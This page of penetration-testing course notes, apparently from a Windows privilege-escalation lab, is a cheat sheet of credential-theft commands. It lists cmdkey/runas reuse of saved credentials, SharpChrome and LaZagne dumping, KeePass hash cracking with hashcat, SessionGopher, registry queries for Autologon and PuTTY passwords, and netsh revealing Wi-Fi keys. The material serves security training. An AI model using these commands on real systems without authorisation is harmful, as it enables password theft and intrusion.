21.Further-credential-theft

Cmdkey Saved Credentials

cmdkey /list
runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Browser Credentials (Chrome)

.\SharpChrome.exe logins /unprotect

Password Managers (KeePass)

python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt

LaZagne

.\lazagne.exe -h
.\lazagne.exe all

SessionGopher

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01

Clear-Text Passwords in Registry (Autologon)

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Clear-Text Passwords in Registry (PuTTY)

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

Wifi Passwords

netsh wlan show profile
netsh wlan show profile ilfreight_corp key=clear

1. Cmdkey Saved Credentials

  • List saved credentials: cmdkey /list

  • Use saved credentials with runas: runas /savecred /user:inlanefreight\bob "COMMAND HERE"

2. Browser Credentials

  • Retrieve Chrome credentials: .\SharpChrome.exe logins /unprotect

3. Password Managers

  • Extract KeePass hash: python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx

  • Crack KeePass hash with Hashcat: hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt

4. Email

  • Search emails for passwords (using MailSniper): (Refer to MailSniper documentation for specific commands)

5. LaZagne

  • View LaZagne help: .\lazagne.exe -h

  • Run all LaZagne modules: .\lazagne.exe all

6. SessionGopher

  • Import SessionGopher module: Import-Module .\SessionGopher.ps1

  • Run SessionGopher: Invoke-SessionGopher -Target WINLPE-SRV01

7. Clear-Text Passwords in Registry

  • Windows Autologon:

    • Enumerate Autologon settings: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

  • PuTTY:

    • Enumerate PuTTY sessions: reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

    • Query specific session: reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

8. Wifi Passwords

  • View saved wireless networks: netsh wlan show profile

  • Retrieve saved wireless password: netsh wlan show profile ilfreight_corp key=clear

Previous20.Other-filesNext6.Restricted Environments

Last updated